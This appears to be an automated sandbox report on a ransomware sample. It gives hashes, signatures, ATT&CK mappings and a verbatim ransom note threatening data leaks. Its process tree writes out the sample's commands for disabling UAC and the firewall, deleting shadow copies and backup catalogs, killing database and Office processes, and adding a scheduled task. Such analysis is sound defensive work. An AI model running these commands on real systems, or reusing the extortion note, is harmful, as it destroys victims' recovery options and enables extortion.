Analysis

  • max time kernel
    134s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    04-05-2022 19:29

General

  • Target

    sample.exe

  • Size

    1.1MB

  • MD5

    a56644a519d6fce5f20a744ae3820af2

  • SHA1

    93acd978da4a602c9ea1a23b6a97d74ced436e56

  • SHA256

    563daaab9f9d7be02f037c540d561c424aa3e5efc6a9a5c8d58858d98e2aae3c

  • SHA512

    5ee5ae6d10bb4c3290664454666bd5f82d694bb772d9d5e6dc9e29cb7129cf696ac5b694676eb78074e4196a459e66f6b34b920017af1cd2addb35a1e1b85416

Malware Config

Extracted

Path

C:\Read_Me!_.txt

Ransom Note

All Your Files Encrypted And Sensitive Data Downloaded (Financial Documents,Contracts,Invoices etc.. ). To Get Decryption Tools You Should Buy Our Decrption Tools And Then We Will Send You Decryption Tools And Delete Your Sensitive Data From Our Servers. If Payment Is Not Made We have to Publish Your Sensitive Data If Necessary Sell Them And Send Them To Your Competitors And After A While Our Servers Will Remove Your Decrypion Keys From Servers. Your Files Encrypted With Strongest Encryption Algorithm So Without Our Decryption Tools Nobody Can't Help You So Do Not Waste Your Time In Vain! Your ID: mnelHr Email Address: Starmoon@my.com In Case Of Problem With First Email Send Us Mail At : starmoonio@tutanota.com Send Your ID In Email And Check Spam Folder. This Is Just Business To Get Benefits, If Do Not Contact Us After 48 Hours Decryption Price Will x2. What Guarantee Do We Give You ? You Should Send Some Encrypted Files To Us For Decryption Test. ---------------------------------------------------------------------- Attention! Do Not Edit Or Rename Encrypted Files. Do Not Try To Decrypt Files By Third-Party Or Data Recovery Softwares It May Damage Files. In Case Of Trying To Decrypt Files With Third-Party Sofwares,This May Make The Decryption Harder So Prices Will Be Rise. ---------------------------------------------------------------------- How To Buy Bitcoin : Buy Bitcoin Instructions At LocalBitcoins : https://localbitcoins.com/guides/how-to-buy-bitcoins Buy Bitcoin Instructions At Coindesk And Get More Info By Searching At Google : https://www.coindesk.com/learn/how-can-i-buy-bitcoin/

Emails

Starmoon@my.com

starmoonio@tutanota.com

Signatures

  • UAC bypass 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 7 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 3 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 10 IoCs
  • Enumerates processes with tasklist 1 TTPs 10 IoCs
  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 40 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sample.exe
    "C:\Users\Admin\AppData\Local\Temp\sample.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:964
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3612
      • C:\Windows\SysWOW64\findstr.exe
        findstr /i "dcdcf"
        3⤵
          PID:620
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /v /fo csv
          3⤵
          • Enumerates processes with tasklist
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1080
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ver
        2⤵
          PID:832
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat
          2⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4832
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat
              4⤵
                PID:2952
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\h4_svc.bat" "
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4080
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /v
                  5⤵
                  • Enumerates processes with tasklist
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1032
                • C:\Windows\SysWOW64\find.exe
                  find /I /c "dcdcf"
                  5⤵
                    PID:4608
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 15 /nobreak
                    5⤵
                    • Delays execution with timeout.exe
                    PID:4476
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist /fi "ImageName eq sample.exe" /fo csv
                    5⤵
                    • Enumerates processes with tasklist
                    PID:2308
                  • C:\Windows\SysWOW64\find.exe
                    find /I "sample.exe"
                    5⤵
                      PID:1804
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 15 /nobreak
                      5⤵
                      • Delays execution with timeout.exe
                      PID:2996
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist /fi "ImageName eq sample.exe" /fo csv
                      5⤵
                      • Enumerates processes with tasklist
                      PID:4900
                    • C:\Windows\SysWOW64\find.exe
                      find /I "sample.exe"
                      5⤵
                        PID:3080
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 15 /nobreak
                        5⤵
                        • Delays execution with timeout.exe
                        PID:2620
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist /fi "ImageName eq sample.exe" /fo csv
                        5⤵
                        • Enumerates processes with tasklist
                        PID:1692
                      • C:\Windows\SysWOW64\find.exe
                        find /I "sample.exe"
                        5⤵
                          PID:2028
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 15 /nobreak
                          5⤵
                          • Delays execution with timeout.exe
                          PID:3152
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist /fi "ImageName eq sample.exe" /fo csv
                          5⤵
                          • Enumerates processes with tasklist
                          PID:3668
                        • C:\Windows\SysWOW64\find.exe
                          find /I "sample.exe"
                          5⤵
                            PID:5108
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 15 /nobreak
                            5⤵
                            • Delays execution with timeout.exe
                            PID:1052
                          • C:\Windows\SysWOW64\tasklist.exe
                            tasklist /fi "ImageName eq sample.exe" /fo csv
                            5⤵
                            • Enumerates processes with tasklist
                            PID:2156
                          • C:\Windows\SysWOW64\find.exe
                            find /I "sample.exe"
                            5⤵
                              PID:612
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 15 /nobreak
                              5⤵
                              • Delays execution with timeout.exe
                              PID:2332
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist /fi "ImageName eq sample.exe" /fo csv
                              5⤵
                              • Enumerates processes with tasklist
                              PID:1560
                            • C:\Windows\SysWOW64\find.exe
                              find /I "sample.exe"
                              5⤵
                                PID:1556
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 15 /nobreak
                                5⤵
                                • Delays execution with timeout.exe
                                PID:3016
                              • C:\Windows\SysWOW64\tasklist.exe
                                tasklist /fi "ImageName eq sample.exe" /fo csv
                                5⤵
                                • Enumerates processes with tasklist
                                PID:1180
                              • C:\Windows\SysWOW64\find.exe
                                find /I "sample.exe"
                                5⤵
                                  PID:4380
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 15 /nobreak
                                  5⤵
                                  • Delays execution with timeout.exe
                                  PID:1112
                                • C:\Windows\SysWOW64\tasklist.exe
                                  tasklist /fi "ImageName eq sample.exe" /fo csv
                                  5⤵
                                  • Enumerates processes with tasklist
                                  PID:2124
                                • C:\Windows\SysWOW64\find.exe
                                  find /I "sample.exe"
                                  5⤵
                                    PID:1804
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 15 /nobreak
                                    5⤵
                                    • Delays execution with timeout.exe
                                    PID:4364
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 90 /nobreak
                                    5⤵
                                    • Delays execution with timeout.exe
                                    PID:5100
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2728
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
                                3⤵
                                • Creates scheduled task(s)
                                PID:4288
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c echo %date%-%time%
                              2⤵
                                PID:4408
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4772
                                • C:\Windows\SysWOW64\systeminfo.exe
                                  systeminfo
                                  3⤵
                                  • Gathers system information
                                  PID:2064
                                • C:\Windows\SysWOW64\find.exe
                                  find /i "os name"
                                  3⤵
                                    PID:2344
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
                                  2⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1980
                                  • C:\Windows\SysWOW64\systeminfo.exe
                                    systeminfo
                                    3⤵
                                    • Gathers system information
                                    PID:2484
                                  • C:\Windows\SysWOW64\find.exe
                                    find /i "original"
                                    3⤵
                                      PID:1408
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ver
                                    2⤵
                                      PID:3396
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
                                      2⤵
                                        PID:3868
                                        • C:\Windows\SysWOW64\nslookup.exe
                                          nslookup myip.opendns.com. resolver1.opendns.com
                                          3⤵
                                            PID:5056
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
                                          2⤵
                                            PID:5028
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                              3⤵
                                              • Modifies registry key
                                              PID:2796
                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                              wmic shadowcopy delete
                                              3⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1580
                                            • C:\Windows\SysWOW64\netsh.exe
                                              netsh advfirewall set currentprofile state off
                                              3⤵
                                                PID:5060
                                              • C:\Windows\SysWOW64\netsh.exe
                                                netsh firewall set opmode mode=disable
                                                3⤵
                                                  PID:3632
                                                • C:\Windows\SysWOW64\netsh.exe
                                                  netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
                                                  3⤵
                                                    PID:1884
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
                                                  2⤵
                                                    PID:4376
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im msftesql.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2828
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im sqlagent.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4348
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im sqlbrowser.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3836
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im sqlservr.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4064
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im sqlwriter.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4272
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im oracle.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4984
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im ocssd.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2732
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im dbsnmp.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4028
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im synctime.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1068
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im agntsvc.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1996
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im mydesktopqos.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1200
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im isqlplussvc.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1380
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im xfssvccon.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3648
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im mydesktopservice.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2332
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im ocautoupds.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:924
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im agntsvc.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1556
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im encsvc.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:544
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im firefoxconfig.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3756
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im tbirdconfig.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:1232
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im ocomm.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:1112
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im mysqld.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:1080
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im mysqld-nt.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:4148
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im mysqld-opt.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3040
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im dbeng50.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:4412
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im sqbcoreservice.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:4360
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im excel.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:4344
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im infopath.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:2980
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im msaccess.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:1032
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im mspub.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:932
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im onenote.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:2608
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im outlook.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3528
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im powerpnt.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:1456
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im steam.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:2836
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im thebat.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3160
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im thebat64.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:4660
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im thunderbird.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:2392
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im visio.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3620
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im winword.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3468
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im wordpad.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3284
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe
                                                    2⤵
                                                      PID:4452
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im notepad.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1628
                                                    • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt
                                                      2⤵
                                                        PID:4728
                                                      • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Read_Me!_.txt
                                                        2⤵
                                                          PID:4144
                                                      • C:\Windows\system32\vssvc.exe
                                                        C:\Windows\system32\vssvc.exe
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4036

                                                      Network

                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                      Execution
                                                        • Scheduled Task (1) T1053

                                                      Persistence
                                                        • Modify Existing Service (1) T1031
                                                        • Scheduled Task (1) T1053

                                                      Privilege Escalation
                                                        • Bypass User Account Control (1) T1088
                                                        • Scheduled Task (1) T1053

                                                      Defense Evasion
                                                        • Bypass User Account Control (1) T1088
                                                        • Disabling Security Tools (1) T1089
                                                        • Modify Registry (2) T1112
                                                        • File Deletion (1) T1107

                                                      Credential Access
                                                        • Credentials in Files (1) T1081

                                                      Discovery
                                                        • Query Registry (2) T1012
                                                        • System Information Discovery (4) T1082
                                                        • Peripheral Device Discovery (1) T1120
                                                        • Process Discovery (1) T1057

                                                      Collection
                                                        • Data from Local System (1) T1005

                                                      Impact
                                                        • Inhibit System Recovery (1) T1490

                                                      Downloads

                                                      • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msoshext.dll
                                                        Filesize: 1.7MB
                                                        MD5: c606bd7c9c733dd27f74157c34e51742
                                                        SHA1: aab92689723449fbc3e123fb614dd536a74b74d4
                                                        SHA256: 606390649012b31b5d83630f1186562e4b1ce4023d8870d8c29eb62e7e0769e0
                                                        SHA512: 5f8fabe3d9753413d1aedcc76b9568c50dd25a5a6aeacd1ce88aecc28c0ba96dac80177679d380708213a0997946e49383bdaca7114c8c9526a24ed999194e38

                                                      • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp140.dll
                                                        Filesize: 613KB
                                                        MD5: c1b066f9e3e2f3a6785161a8c7e0346a
                                                        SHA1: 8b3b943e79c40bc81fdac1e038a276d034bbe812
                                                        SHA256: 99e3e25cda404283fbd96b25b7683a8d213e7954674adefa2279123a8d0701fd
                                                        SHA512: 36f9e6c86afbd80375295238b67e4f472eb86fcb84a590d8dba928d4e7a502d4f903971827fdc331353e5b3d06616664450759432fdc8d304a56e7dacb84b728

                                                      • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dll
                                                        Filesize: 83KB
                                                        MD5: 1453290db80241683288f33e6dd5e80e
                                                        SHA1: 29fb9af50458df43ef40bfc8f0f516d0c0a106fd
                                                        SHA256: 2b7602cc1521101d116995e3e2ddfe0943349806378a0d40add81ba64e359b6c
                                                        SHA512: 4ea48a11e29ea7ac3957dcab1a7912f83fd1c922c43d7b7d78523178fe236b4418729455b78ac672bb5632ecd5400746179802c6a9690adb025270b0ade84e91

                                                      • C:\Read_Me!_.txt
                                                        Filesize: 1KB
                                                        MD5: f9f261a411dd279fdf572a7b85ad3c35
                                                        SHA1: aa4c4ab38c5199b8f00314e2610e7ef420fd5542
                                                        SHA256: 66607908902577f4cff760490e61d20012387532d61e2dc3bbbd3ae3297fc0ec
                                                        SHA512: e6e1570d9cef61c3f937ae29d42af3e97017addeb07a12304b1922a9758a8a8051f33261cd26f00956a4559f903675609820b6e802a4c5d169bbd35d224dd202

                                                      • C:\Users\Admin\AppData\h4_svc.bat
                                                        Filesize: 1KB
                                                        MD5: 4d428091b2808d90b7945c27b2c23a04
                                                        SHA1: d74afbc10ad68549bb9b27132b573d980785c2a7
                                                        SHA256: 00eb0cf67c2cfa7f93b67c3320e897effb70d022dce30a40a70f044a4d9518e2
                                                        SHA512: 90ec5493e498dc102ad22f708a8fd334e9f4311101f5534f99c5fd773d9e9db9441832942eefdfefb8d32c223635bcfa6af79b5cef47508adb7afe3c5b4a18a7

                                                      • C:\Users\Admin\AppData\t2_svc.bat
                                                        Filesize: 138B
                                                        MD5: 702f5dc6f9dec28c8c9b7b6885c9fe09
                                                        SHA1: dbb85da6de899deb21ce0a8f25c1726cd19e49e8
                                                        SHA256: 20bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9
                                                        SHA512: fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7

                                                      • C:\Users\Admin\AppData\v9_svc.vbs
                                                        Filesize: 686B
                                                        MD5: e9c50acda9063b2462697bdbd0a0dfe2
                                                        SHA1: d1a2bc54905ce0e9121f8e5c249e0527f2190b7e
                                                        SHA256: f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd
                                                        SHA512: d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9

                                                      • C:\Users\Read_Me!_.txt
                                                        Filesize: 1KB
                                                        MD5: f9f261a411dd279fdf572a7b85ad3c35
                                                        SHA1: aa4c4ab38c5199b8f00314e2610e7ef420fd5542
                                                        SHA256: 66607908902577f4cff760490e61d20012387532d61e2dc3bbbd3ae3297fc0ec
                                                        SHA512: e6e1570d9cef61c3f937ae29d42af3e97017addeb07a12304b1922a9758a8a8051f33261cd26f00956a4559f903675609820b6e802a4c5d169bbd35d224dd202

                                                      • memory/544-179-0x0000000000000000-mapping.dmp
                                                      • memory/620-132-0x0000000000000000-mapping.dmp
                                                      • memory/832-133-0x0000000000000000-mapping.dmp
                                                      • memory/924-177-0x0000000000000000-mapping.dmp
                                                      • memory/932-194-0x0000000000000000-mapping.dmp
                                                      • memory/1032-193-0x0000000000000000-mapping.dmp
                                                      • memory/1032-147-0x0000000000000000-mapping.dmp
                                                      • memory/1068-171-0x0000000000000000-mapping.dmp
                                                      • memory/1080-131-0x0000000000000000-mapping.dmp
                                                      • memory/1080-183-0x0000000000000000-mapping.dmp
                                                      • memory/1112-182-0x0000000000000000-mapping.dmp
                                                      • memory/1200-173-0x0000000000000000-mapping.dmp
                                                      • memory/1232-181-0x0000000000000000-mapping.dmp
                                                      • memory/1380-174-0x0000000000000000-mapping.dmp
                                                      • memory/1408-152-0x0000000000000000-mapping.dmp
                                                      • memory/1556-178-0x0000000000000000-mapping.dmp
                                                      • memory/1580-158-0x0000000000000000-mapping.dmp
                                                      • memory/1804-185-0x0000000000000000-mapping.dmp
                                                      • memory/1884-161-0x0000000000000000-mapping.dmp
                                                      • memory/1980-150-0x0000000000000000-mapping.dmp
                                                      • memory/1996-172-0x0000000000000000-mapping.dmp
                                                      • memory/2064-144-0x0000000000000000-mapping.dmp
                                                      • memory/2124-134-0x0000000000000000-mapping.dmp
                                                      • memory/2308-184-0x0000000000000000-mapping.dmp
                                                      • memory/2332-176-0x0000000000000000-mapping.dmp
                                                      • memory/2344-145-0x0000000000000000-mapping.dmp
                                                      • memory/2484-151-0x0000000000000000-mapping.dmp
                                                      • memory/2608-195-0x0000000000000000-mapping.dmp
                                                      • memory/2728-138-0x0000000000000000-mapping.dmp
                                                      • memory/2732-169-0x0000000000000000-mapping.dmp
                                                      • memory/2796-157-0x0000000000000000-mapping.dmp
                                                      • memory/2828-163-0x0000000000000000-mapping.dmp
                                                      • memory/2952-140-0x0000000000000000-mapping.dmp
                                                      • memory/2980-192-0x0000000000000000-mapping.dmp
                                                      • memory/2996-187-0x0000000000000000-mapping.dmp
                                                      • memory/3040-188-0x0000000000000000-mapping.dmp
                                                      • memory/3396-153-0x0000000000000000-mapping.dmp
                                                      • memory/3528-196-0x0000000000000000-mapping.dmp
                                                      • memory/3612-130-0x0000000000000000-mapping.dmp
                                                      • memory/3632-160-0x0000000000000000-mapping.dmp
                                                      • memory/3648-175-0x0000000000000000-mapping.dmp
                                                      • memory/3756-180-0x0000000000000000-mapping.dmp
                                                      • memory/3836-165-0x0000000000000000-mapping.dmp
                                                      • memory/3868-154-0x0000000000000000-mapping.dmp
                                                      • memory/4028-170-0x0000000000000000-mapping.dmp
                                                      • memory/4064-166-0x0000000000000000-mapping.dmp
                                                      • memory/4080-146-0x0000000000000000-mapping.dmp
                                                      • memory/4148-186-0x0000000000000000-mapping.dmp
                                                      • memory/4272-167-0x0000000000000000-mapping.dmp
                                                      • memory/4288-139-0x0000000000000000-mapping.dmp
